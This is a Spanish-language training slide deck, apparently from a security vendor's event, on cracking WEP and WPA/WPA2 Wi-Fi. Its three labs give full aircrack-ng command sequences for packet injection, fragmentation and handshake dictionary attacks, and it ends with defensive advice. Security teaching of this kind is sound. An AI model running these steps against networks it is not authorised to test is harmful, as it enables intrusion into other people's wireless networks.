SECURITY DAY PERU. Ataques a las Redes Inalámbricas. Vulnerando Redes Inalámbricas WEP y WPA. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

Tamaño: px

Comenzar la demostración a partir de la página:

Download "SECURITY DAY PERU. Ataques a las Redes Inalámbricas. Vulnerando Redes Inalámbricas WEP y WPA. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP"

Alfonso Castilla Hernández
hace 8 años
Vistas:

SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo.

1 SOLUTIONS FOR KEEPING YOUR BUSINESS UP Tel. +(507) Tel. +(1) Aptdo , Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Redes Inalámbricas Vulnerando Redes Inalámbricas WEP y WPA Technologies 1

2 Security Day> Perú> Agenda Lab 1. Explotando Vulnerabilidad de WEP con clientes inalámbricos Lab 2. Explotando Vulnerabilidad de WEP sin clientes inalámbricos Lab 3. Explotando Vulnerabilidad de WPA 2

3 Ataque a WEP con clientes Ésta vulnerabilidad aprovecha el empleo de RC4, contiene múltiples debilidades documentadas desde setiembre de La contraseña es simétrica (estática) y se comparte entre los puntos de acceso y los clientes (compartida). El ataque con clientes (repetición) es viable en la mayoría de AP. 3

4 Lab del ataque WEP con clientes Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de inyección con clientes. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 --encrypt wep -w ximark --bssid 00:19:5b:e0:22:2e -c 10 4

5 Lab del Ataque a WEP con clientes Ejecutamos la asociación al AP aireplay-ng e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Realizamos la inyección de paquetes aireplay-ng -3 -e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Recuperamos la contraseña del AP aircrack-ng -z -0 ximark-02.cap 5

6 Ataque a WEP sin clientes Ésta vulnerabilidad aprovecha el empleo de RC4, contiene múltiples debilidades documentadas desde setiembre de La contraseña es simétrica (estática) y se comparte entre los puntos de acceso y los clientes (compartida). El ataque sin clientes (fragmentación) es viable en algunos tipos de AP, cuando no, se debe probar korek chop chop. 6

7 Lab del Ataque a WEP sin clientes Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de fragmentación. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 --encrypt wep -w ximark --bssid 00:19:5b:e0:22:2e -c 10 7

8 Lab del Ataque a WEP sin clientes Ejecutamos el ataque de fragmentación aireplay-ng e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 aireplay-ng -5 -b 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Generamos el paquete a inyectar packetforge-ng -0 -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b -k l y fragment xor -w paquete Realizamos la inyección de paquetes aireplay-ng -2 -r paquete mon0 Recuperamos la contraseña del AP aircrack-ng -z -0 ximark-02.cap 8

9 Ataque a WPA/WPA2 Esta vulnerabilidad se basa en la captura del 4 way handshake, realizado en la asociación y autenticación de un cliente y un AP. Afecta a todos los dispositivos que empleen autenticación con cifrado TKIP. 9

10 Lab del ataque WPA/WPA2 Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de inyección con clientes. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 -w ximark --bssid 00:19:5b:e0:22:2e -c 10 10

11 Lab del ataque a WPA/WPA2 Ejecutamos la asociación al AP aireplay-ng a 00:19:5b:e0:22:2e -c 00:c0:ca:19:cd:4b mon0 Recuperamos la contraseña del AP aircrack-ng w /carpeta/diccionario ximark-02.cap 11

12 Ataques a las Redes Inalámbricas> Soluciones Emplear contraseñas largas que no se puedan ubicar en diccionarios. No emplear WEP o WPA/WPA2 PSK en entornos empresariales. Actualice o reemplace los equipos que sólo soporten WEP. No se conecten a AP sospechosos. 12

Documentos relacionados

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA Aetsu alpha.aetsu@gmail.com Esta obra se encuentra bajo la licencia Creative Commons 3.0 España: 1 Cifrado WEP Todos los ataques En esta parte del manual explicaré de forma